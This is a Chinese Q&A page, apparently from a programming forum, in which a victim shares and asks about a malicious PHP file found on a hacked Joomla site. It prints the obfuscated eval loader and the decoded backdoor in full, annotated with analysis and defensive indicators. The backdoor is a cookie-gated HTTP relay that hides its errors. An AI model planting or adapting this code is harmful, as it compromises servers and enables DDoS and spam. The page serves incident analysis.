在被黑的Joomla网站中找到奇怪的文件

时间:2016-02-17 08:17:47

标签: php joomla

我朋友的Joomla网站今天被黑了，我收到了这个文件，据说它就是罪魁祸首。

<?php
// Decoder for the obfuscated payload below. Walks $zezy byte by byte and
// replaces each byte that has an entry in the substitution map $rwsw
// (bytes without an entry are kept unchanged), then base64-decodes the
// result. The decoder is invoked through a string variable ($q) rather than
// as a direct call, presumably so that a literal search for
// "base64_decode(" does not match this file.
function uxqdz($zezy, $rwsw){$pdnpgtd = ''; for($i=0; $i < strlen($zezy); $i++){$pdnpgtd .= isset($rwsw[$zezy[$i]]) ? $rwsw[$zezy[$i]] : $zezy[$i];}
$q="base64_decode";return $q($pdnpgtd);}

// Encoded payload: base64 text whose characters were remapped through the
// substitution table assigned to $eqjbe further down. uxqdz() reverses the
// mapping and base64-decodes it; the plaintext is the second listing on
// this page.
$llwes = '4osVIObTD84Zy36FtLuMf8scD8yKrLyTyKmmJAMCziuFr7sct3OGJzkMr3kcD8yKrLyTyK'.
'mmJAMCziustHy5tsbKD8u5tH6Fr7tZ0zivS4Fht3OG8L6Fr9OcrosQI84Z0zivS4FhI9kVrLys8LOTD8'.
'ycf9y5tH4Z0BivS4FhI9aF8LCskzYHr9en83OnD9C1kos5rsbGI91syKmmJAMCzYGJD7bKD9eNIzhZyebSAGbR'.
'BqqYf80YyosGD9GFS4FvS4ZYjzhYI9fYJz6FkoOQjzpbjzyNDNeiCSfnDzGTD9ysRA4GCoqQf94LfKGmXSp1CoyiCoC70o0xJ'.
'4GJjzhYjzhYjzusgosGJzivS4FbS4ZCzx6if862jSGYD7sMDObHD86cf3bVkoOVkP0ZyLu'.
'ZtSZ5R3sVtPOGyKivS4ZiDoeGfBhbjPCmrosGJzjbjxmiDoeGfBmKJAMCzYGJyoj3CebiD9C5DoOcDoeGfBhbjoy2t3q3CebiD9'.
'C5DoqZk8yMDoONr36sJz6if8629TekJBivS4ZCzx6TD9ai8362kopYwBu1rHCst7'.
's2rosdDB2iD9CKg8uGJz6xCN6cDoONr36s8362kopFJAMCzYGJy'.
'PystLOMkzhbjPCsr76cDoeGfApYJz6TD9ai8362kopFXmGJS4FFDxhZjB6KD8C1rP4FS4FvS4ZYjz'.
'hYyPystLOMkzhbjPCsr76cDoeGfAjZyPCsr76cDoeGfBivS4FbS4ZCz7ONIoWYyPystLOMkSMCzYGJDHO'.
'VfL6Fr3nYDoONtHsmkzYiDoeGfBiCzHMCzxhYjzhirLOG8362ko'.
'pYwBhxjNMCzxhYjzhiI3OajSGYyebA6Oy96OyryG2qOeucBpbAOzkk'.
'jznYyebA6Oy96Oyry1yeqOOeq16cOOyyy1GvS4ZYjzhYyoQsgObMD9nYwBuTkPyMD9nZyoQsg'.
'BivS4ZYS4ZYjzhYD7bKjzYiIAGmXKhiIBhWjPCGt7EsrxYiI3OaJAMYyoilJKiCzxhYjzuvS4ZYjzhYjzhYjz6lD8sryos'.
'kjSGYf32KJobKDzYiI3Oa9K6F8BiY8xhZyoQsgObMD9nYyBhKCAqFJAMCzxhYjzubS4ZCzxh'.
'Yjzu7rLjYJz6FwAhvjz6FwPCGt7EsrxYiDoeGfBivJ4GJjzhYjPMCzxhYjzhYjzhYD7bKjzYiIN'.
'GmXKhiINETkPyMD9nZyoQsgBiYyxfYyoiWtL6KroOVJz6if862JAMYyoZlJKmYyoilJKiCzxhYjzhYjzhYg'.
'mGJjzhYjzhYjzhYjzhYyob1kebif862jznbjoCZtx25t74Zyo62koeryoskJBugjobKDzYiI3Oa9K6U8BiFXmGJjzhYjzhYjzu'.
'bS4ZYjzhYc4GJS4ZYjzhYt7OGk8yVjz65k86cDoeGfAMCzHGCzYGJDHOVfL6Fr3nYt3OVDebif8'.
'620BYiDoeGfBiCzHMCzxhYjzhiIoO2DzhbjzjxXmGJS4ZYjzhYD7bKD9eNIzYiDoeGfOMxIoO2DoOKtKykjoeTjz6lD8ibw'.
'x63f9E1DBiCzxhYjzuvS4ZYjzhYjzhYjz6ZD9eijznbjz6lD8iYRxhxXxhxjznYyPD2rPOsjznYjsEK8onxXmGJjzh'.
'YjPGCzYGJjzhYjz6mf8y2r80YwBu2tHy2gBYHIP6GtztYwAnYf8yKf8iZS4ZYjzhYjzhYjzk'.
'QD86Zr34HjSG+jz6if8629KyQD86Zr34x8BmCzxhYjzhYjzhYy32sf96s'.
'txtYwAnYyo2sf94MS4ZYjzhYjzhYjzkNr3aGD9aGyKhbwxhiDoeGfOMx'.
'f7bigBykRhGJjzhYjzhYjzhHkosQD9b1kztYwAnYyo62koerjH6Fr9O5k84x8BmCzxhYjzhYj'.
'zhYS4ZYjzhYJBivS4ZCzxhYjzhifL6njSGYtL6KD9eQ83C5rH6sgP6cfLysf86sJz6mf8y2r80FXmGJjzhYjhGJjzhYjz6KD8C'.
'1rP4YwBuhD7sMDObHD86cf3bVkoOVkP0Zyo62koerjHOKrzykRzuo4qEA6BmYyoCGgzivS4ZCzxhYjzuFDxhZyo2'.
'GkPuct7OTtobVt3OcIoO2DoOKJ4GJjzhYjPMCzxhYjzhYjzhYI9fYJP'.
'CGtHu5tKYiIP6GtebKD8Cmr3aTDObZD9eiD8yr0eGMjzjK0ShxJBhbwAGY6ie'.
'0qGqFS4ZYjzhYjzhYjPMCzxhYjzhYjzhYjzhYjz6KD8C1rP4YwBhxBe6qqebeqsywqsEGjxhVjz6ZkP6m'.
'8LystLu5rHCs832sf96stsMm8AMCzxhYjzhYjzhYc4GJjzhYjPGCzxhYjzusrPCsS4ZY'.
'jzhYgmGJjzhYjzhYjzhit7OTk9EGjSGYjiCwAiae416yAGac6OyBA1j'.
'xXmGJjzhYjPGCzYGJjzhYjPyskPOKrxhit7OTk9EGXmGJc4GJS4F7k9aNkos5rxuTD9ai8362kopKJz6if862J4GJgmGJjz'.
'hYjzW5jPOTDBuTr3ClD86TS4Fb';

// Substitution table consumed by uxqdz(): each key is a character as it
// appears in $llwes, each value is the corresponding character of the real
// base64 text. Digits, letters and case are all remapped; '1' maps to itself.
$eqjbe = Array('1'=>'1', '0'=>'M', '3'=>'2', '2'=>'h', '5'=>'v', '4'=>'Q', '7'=>'m', '6'=>'R', '9'=>'W', '8'=>'X', 'A'=>'T', 'C'=>'N', 'B'=>'S', 'E'=>'x', 'D'=>'Z', 'G'=>'0', 'F'=>'p', 'I'=>'a', 'H'=>'n', 'K'=>'y', 'J'=>'K', 'M'=>'s', 'L'=>'3', 'O'=>'V', 'N'=>'j', 'Q'=>'t', 'P'=>'H', 'S'=>'D', 'R'=>'L', 'U'=>'q', 'T'=>'z', 'W'=>'8', 'V'=>'u', 'Y'=>'g', 'X'=>'O', 'Z'=>'o', 'a'=>'5', 'c'=>'f', 'b'=>'9', 'e'=>'F', 'd'=>'6', 'g'=>'e', 'f'=>'Y', 'i'=>'k', 'h'=>'A', 'k'=>'d', 'j'=>'I', 'm'=>'w', 'l'=>'r', 'o'=>'G', 'n'=>'4', 'q'=>'U', 'p'=>'E', 's'=>'l', 'r'=>'b', 'u'=>'B', 't'=>'c', 'w'=>'P', 'v'=>'7', 'y'=>'J', 'x'=>'i', 'z'=>'C');

// Decode and execute the payload in the same process. For triage, replacing
// eval() with echo recovers the plaintext without executing it, which is how
// the poster obtained the second listing. The eval()-of-a-decoded-string
// shape, together with the single-letter decoder above, is the signature a
// file-integrity or webshell scanner should key on.
eval(uxqdz($llwes, $eqjbe));?>

我把eval去掉、改为回显其返回值，从而解出了字符串；下面就是被eval执行的脚本。

// Hardening of the backdoor itself: silence error display and logging and
// lift the execution-time limit so the proxied request below neither leaks
// diagnostics into responses or error logs nor gets killed on a slow
// upstream or a client disconnect. The leading '@' additionally suppresses
// any warning if a setting cannot be changed. Practical consequence for
// incident response: this file leaves no trace in the PHP error log, so
// web-server access logs are the place to look for it.
@ini_set('display_errors',0);
@ini_set('log_errors',0);
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);

// Access gate: every cookie value sent with the request must equal the fixed
// token or the script exits before reading the body. Two things visible in
// the code matter for triage: (1) a request that carries no cookies at all
// never enters the loop body and therefore passes the gate; (2) the check is
// a loose comparison (!=), not ===. The literal token is a concrete
// indicator for searching access logs and proxy logs.
foreach ($_COOKIE as $item)
{
    if ($item != "cf1d468d-3ebe-444e-ad7c-08154bd4cf0c")
        exit();
}

// Request pipeline: raw POST body -> text after the first '=' -> urldecode
// -> base64_decode -> decrypt() (repeating-key XOR, see below) -> unserialize().
// Everything fed to unserialize() is attacker-supplied, so besides the
// intended proxy behaviour this line is also a PHP object-injection sink.
$data = file_get_contents('php://input');
// split() is the POSIX-regex function that was removed in PHP 7, so this
// sample only runs on PHP 5.x. The limit of 2 keeps everything after the
// first '=' in $data[1] (a form-style "name=<payload>" body).
$data = split("=",$data,2);

$b64_decode_data = base64_decode(urldecode($data[1]));

$send_data = unserialize(decrypt($b64_decode_data));

// Relay the described request. send_data2() is an empty stub, and the error
// paths of send_data1() return non-empty strings, so the fallback is only
// reached for a successful response with an empty body and then yields null.
$result = send_data1 ($send_data);

if (!$result)
{
    $result = send_data2($send_data);
}

// The upstream response body (or an error marker) is written back verbatim.
echo $result;

// Repeating-key XOR applied to the request body.
// Key derivation: HTTP_HOST . REQUEST_URI, with every key byte XORed by
// (key length mod 255); the data is then XORed against that key cyclically.
// What follows from the code:
//   - the key depends only on the Host header and the path the script was
//     requested at, so the operator must know where the file was dropped,
//     and moving or renaming the file breaks the existing client;
//   - XOR is symmetric, so this is obfuscation rather than confidentiality;
//     the same routine undoes itself.
// @param string $data ciphertext bytes
// @return string plaintext bytes (subsequently passed to unserialize())
function decrypt($data)
{
    $out_data = "";
    // Both components come from the request, so the client controls the key.
    $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $key_len = strlen($key);

    // Whiten the key in place (string offset assignment) with a one-byte constant.
    for ($i=0; $i < strlen($key); $i++)
    {
        $key[$i] = chr(ord($key[$i]) ^ ($key_len % 255));
    }

    // Outer loop advances $i over the data; the inner loop cycles $j over the key.
    for ($i=0; $i<strlen($data);)
    {
        for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
        {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }

    return $out_data;
}

// Performs the server-side HTTP request described by the deserialized $data
// array. Method, headers, body, timeout and destination URL are all taken
// verbatim from the request, which turns this host into an HTTP relay for
// whoever holds the cookie token; the upstream response body is returned
// unchanged for the caller to echo.
// Keys read from $data: "headers" (name => value map), "method", "body",
// "timeout", "url".
// Defensive notes grounded in this code: the only observable artefact on the
// host is outbound HTTP from the web-server process to arbitrary hosts
// (egress filtering and proxy logs), and file_get_contents() on a URL
// requires allow_url_fopen to be enabled, so disabling it makes this
// function return "CONNECTION_ERROR" for every request.
// @param array $data request description from unserialize()
// @return string|false upstream body, "HTTP_ERROR\t<status line>", or "CONNECTION_ERROR"
function send_data1($data)
{
    $head = "";

    // Flatten the header map into raw "Name: value\r\n" lines; nothing is validated.
    foreach($data["headers"] as $key=>$value)
    {
        $head .= $key . ": " . $value . "\r\n";
    }

    $params = array('http' => array(
        'method' => $data["method"],
        'header' => $head,
        'content' => $data["body"],
        'timeout' => $data["timeout"],

    ));

    $ctx = stream_context_create($params);

    // '@' hides DNS/connect/HTTP warnings. $http_response_header is populated
    // by the http stream wrapper only when a response was actually received.
    $result = @file_get_contents($data["url"], FALSE, $ctx);

    if ($http_response_header)
    {
        // Any status line that does not contain "200" is reported back together
        // with that status line instead of the body.
        if (strpos($http_response_header[0], "200") === FALSE)
        {
            $result = "HTTP_ERROR\t" . $http_response_header[0];
        }
    }
    else
    {
        // No headers at all: the connection itself failed (or URL fetching is disabled).
        $result = "CONNECTION_ERROR";
    }

    return $result;
}

// Socket-based fallback that was never implemented: the body is a comment
// only, so the function always returns null. The caller reaches it only when
// send_data1() returned a falsy value, i.e. a successful response with an
// empty body, in which case nothing is echoed.
// @param array $data request description (unused)
// @return null
function send_data2($data)
{
    // use sockets
}

它看起来像是某种文件上传脚本，但我不确定它到底是如何工作的。

可以解释一下这是什么吗?

非常感谢

1 个答案:

答案 0 :(得分:0)

黑客会利用这段代码，让您的服务器按照他在请求中给出的网址去请求远程服务器。黑客只需访问（ping）您服务器上的这个文件即可，例如：http://your.server.com/x.php

这种做法通常被用于DDoS攻击或发送垃圾邮件。